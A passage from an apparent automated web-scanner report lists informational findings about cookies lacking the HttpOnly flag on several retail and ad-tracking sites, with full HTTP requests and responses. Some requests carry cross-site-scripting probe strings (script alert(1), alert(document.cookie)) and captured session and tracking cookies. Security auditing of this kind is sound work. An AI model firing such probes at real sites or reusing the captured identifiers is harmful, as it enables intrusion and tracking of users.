Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=20480;evt=12869;cat1=14057;cat2=14058 HTTP/1.1
Host: media.fastclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 302 Redirect
Date: Mon, 16 May 2011 10:41:38 GMT
Set-Cookie: pluto2=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=xY9oCKaH0wEQmpS17AM&amp;guid=ON&amp;script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=AQAAAAEAAKAAAFCgByAAA+o2AAA=; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
Set-Cookie: pluto=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT


13.102. http://media.gnc.com/ipixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gnc.com
Path:   /ipixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipixel?spacedesc=1087272_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=GNC&event=Homepage&random=1305510847078&te_siteid=76&te_pagetype=home&REVENUE=&USERID=125602265854&ORDERID=&PRODUCTID=&CATEGORYID=0&REFERRER=&CARTVALUE=&CARTQTY= HTTP/1.1
Host: media.gnc.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; mt.v=1.1817838745.1305510198897

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=41-1015464695; expires=Wed, 15 May 2013 13:58:34 GMT; path=/; domain=.gnc.com
Content-Type: text/html
Content-Length: 31
Connection: close

<HTML><BODY>


</BODY></HTML>

13.103. http://media.gsimedia.net/ipixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /ipixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipixel?spacedesc=1087320_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=ACE&event=Homepage&random=1305510836880&te_siteid=133&te_pagetype=home&REVENUE=&USERID=125602208394&ORDERID=&PRODUCTID=&CATEGORYID=0&REFERRER=&CARTVALUE=&CARTQTY= HTTP/1.1
Host: media.gsimedia.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=22-662078189

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:27 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=22-662078189; expires=Wed, 15 May 2013 13:56:27 GMT; path=/; domain=.gsimedia.net
Content-Type: text/html
Content-Length: 30
Connection: close

<HTML><BODY>


</BODY></HTML>

13.104. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /b/ss/bstoneprod/1/H.21/s01194140000734

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/bstoneprod/1/H.21/s01194140000734?AQB=1&ndh=1&t=15/4/2011%2020%3A55%3A9%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=homepage&g=http%3A//www.brookstone.com/&cc=USD&h1=homepage&c4=homepage&v11=New&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acategory_root%5E%5E%28%272%27%29&v16=First%20Visit&c20=3330&c21=2&c25=results&v28=navigation&v32=SEARCH%2BNAV&v44=Direct%20Load&v45=Direct%20Load&v46=N/A&v47=No%20Referrer&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305510909785%7C1368582909785%3B%20s_lv%3D1305510909788%7C1400118909788%3B%20s_lv_s%3DFirst%2520Visit%7C1305512709788%3B%20s_vs%3D1%7C1305512709800%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:54 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E842E7051D1631-40000143C001ABA1[CE]; Expires=Sat, 14 May 2016 02:02:54 GMT; Domain=.brookstone.com; Path=/
Location: http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734?AQB=1&pccr=true&vidn=26E842E7051D1631-40000143C001ABA1&&ndh=1&t=15/4/2011%2020%3A55%3A9%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=homepage&g=http%3A//www.brookstone.com/&cc=USD&h1=homepage&c4=homepage&v11=New&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acategory_root%5E%5E%28%272%27%29&v16=First%20Visit&c20=3330&c21=2&c25=results&v28=navigation&v32=SEARCH%2BNAV&v44=Direct%20Load&v45=Direct%20Load&v46=N/A&v47=No%20Referrer&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 02:02:54 GMT
Last-Modified: Tue, 17 May 2011 02:02:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain


13.105. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /b/ss/gsicgncf/1/H.20.3/s35472931402100

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/gsicgncf/1/H.20.3/s35472931402100?AQB=1&ndh=1&t=16/4/2011%205%3A52%3A55%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp%3Frdir%3D1A&r=http%3A//burp/show/8&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305543175232%7C1308135175232%3B%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20gpv_p6%3DHome%2520Page%7C1305544975234%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:52:57 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E8810485163B23-40000183E0155674[CE]; Expires=Sat, 14 May 2016 10:52:57 GMT; Domain=.gnc.com; Path=/
Location: http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100?AQB=1&pccr=true&vidn=26E8810485163B23-40000183E0155674&&ndh=1&t=16/4/2011%205%3A52%3A55%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp%3Frdir%3D1A&r=http%3A//burp/show/8&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:52:57 GMT
Last-Modified: Tue, 17 May 2011 10:52:57 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www431
Content-Length: 0
Content-Type: text/plain


13.106. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /b/ss/gsicpet/1/H.20.3/s38054509394851

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/gsicpet/1/H.20.3/s38054509394851?AQB=1&ndh=1&t=16/4/2011%205%3A50%3A14%201%20300&vmt=2932E0&ns=gsicpet&pageName=Home%20Page&g=http%3A//www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert%281%29%253C/script%253E3105c4c3d6e%3D1&r=http%3A//burp/show/6&ch=Home%20Page&server=www.petsmart.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c12=Home%20Page&v26=Weekday&v27=New&v28=6%3A30AM&v34=Monday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1
Cookie: __utma=113636102.2132591238.1305543014.1305543014.1305543014.1; __utmb=113636102.1.10.1305543014; __utmc=113636102; __utmz=113636102.1305543014.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; mt.v=1.1280321277.1305543014584; s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305543014601%7C1308135014601%3B%20s_lastvisit%3D1305543014602%7C1400151014602%3B%20gpv_p27%3DHome%2520Page%7C1305544814603%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:50:16 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E880B4050116FC-60000108C015DA82[CE]; Expires=Sat, 14 May 2016 10:50:16 GMT; Domain=.petsmart.com; Path=/
Location: http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851?AQB=1&pccr=true&vidn=26E880B4050116FC-60000108C015DA82&&ndh=1&t=16/4/2011%205%3A50%3A14%201%20300&vmt=2932E0&ns=gsicpet&pageName=Home%20Page&g=http%3A//www.petsmart.com/%3F5f832--%253E%253Cscript%253Ealert%281%29%253C/script%253E3105c4c3d6e%3D1&r=http%3A//burp/show/6&ch=Home%20Page&server=www.petsmart.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c12=Home%20Page&v26=Weekday&v27=New&v28=6%3A30AM&v34=Monday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:50:16 GMT
Last-Modified: Tue, 17 May 2011 10:50:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain


13.107. http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356?AQB=1&ndh=1&t=16%2F4%2F2011%205%3A41%3A20%201%20300&ce=UTF-8&ns=toshiba&pageName=Search%3ALaptops%20Home%20Page&g=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Flaptops.to%3Fpage%3DsegHHO%26d835f%2527-alert(document.cookie)-%252782064d64928%3D1&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&events=event1%2Cevent3&c1=Search&v1=D%3Dc1&h1=Search&c2=Search&v2=D%3Dc2&c3=Search&v3=D%3Dc3&h3=Referrers&c4=Search&v4=D%3Dc4&v10=Search%3ALaptops%20Home%20Page&c17=D%3Dgn&c22=New&v22=New&c23=D%3Dgn&c26=1&v26=D%3Dc26&c27=First%20Visit&v27=D%3Dc27&c41=3%3A30AM&v41=D%3Dc41&c42=Monday&v42=D%3Dc42&v44=Referrers&c45=Referrers&v45=Referrers&v46=n%2Fa&v47=n%2Fa&v48=burp&c49=WCON&v49=D%3Dc49&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=829&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: o.toshibadirect.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3Dundefinedburpburp%3B; s_pers=%20s_vnum%3D1308134480818%2526vn%253D1%7C1308134480818%3B%20s_invisit%3Dtrue%7C1305544280818%3B%20omtr_lv%3D1305542480819%7C1400150480819%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305544280819%3B%20s_nr%3D1305542480820%7C1308134480820%3B%20omtr_eVar45_cvp%3D%255B%255B'Referrers'%252C'1305542480823'%255D%255D%7C1463395280823%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305544280824%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:41:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E87FB0051D141D-4000013200014B2A[CE]; Expires=Sat, 14 May 2016 10:41:36 GMT; Domain=.toshibadirect.com; Path=/
Location: http://o.toshibadirect.com/b/ss/toshibadirectprod,toshibaglobal/1/H.22.1/s3167527708356?AQB=1&pccr=true&vidn=26E87FB0051D141D-4000013200014B2A&&ndh=1&t=16%2F4%2F2011%205%3A41%3A20%201%20300&ce=UTF-8&ns=toshiba&pageName=Search%3ALaptops%20Home%20Page&g=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Flaptops.to%3Fpage%3DsegHHO%26d835f%2527-alert(document.cookie)-%252782064d64928%3D1&r=http%3A%2F%2Fburp%2Fshow%2F2&cc=USD&events=event1%2Cevent3&c1=Search&v1=D%3Dc1&h1=Search&c2=Search&v2=D%3Dc2&c3=Search&v3=D%3Dc3&h3=Referrers&c4=Search&v4=D%3Dc4&v10=Search%3ALaptops%20Home%20Page&c17=D%3Dgn&c22=New&v22=New&c23=D%3Dgn&c26=1&v26=D%3Dc26&c27=First%20Visit&v27=D%3Dc27&c41=3%3A30AM&v41=D%3Dc41&c42=Monday&v42=D%3Dc42&v44=Referrers&c45=Referrers&v45=Referrers&v46=n%2Fa&v47=n%2Fa&v48=burp&c49=WCON&v49=D%3Dc49&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=829&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:41:36 GMT
Last-Modified: Tue, 17 May 2011 10:41:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www344
Content-Length: 0
Content-Type: text/plain


13.108. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

13.109. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

13.110. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
Cache-Control: max-age=0
Origin: https://ordering.ftd.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
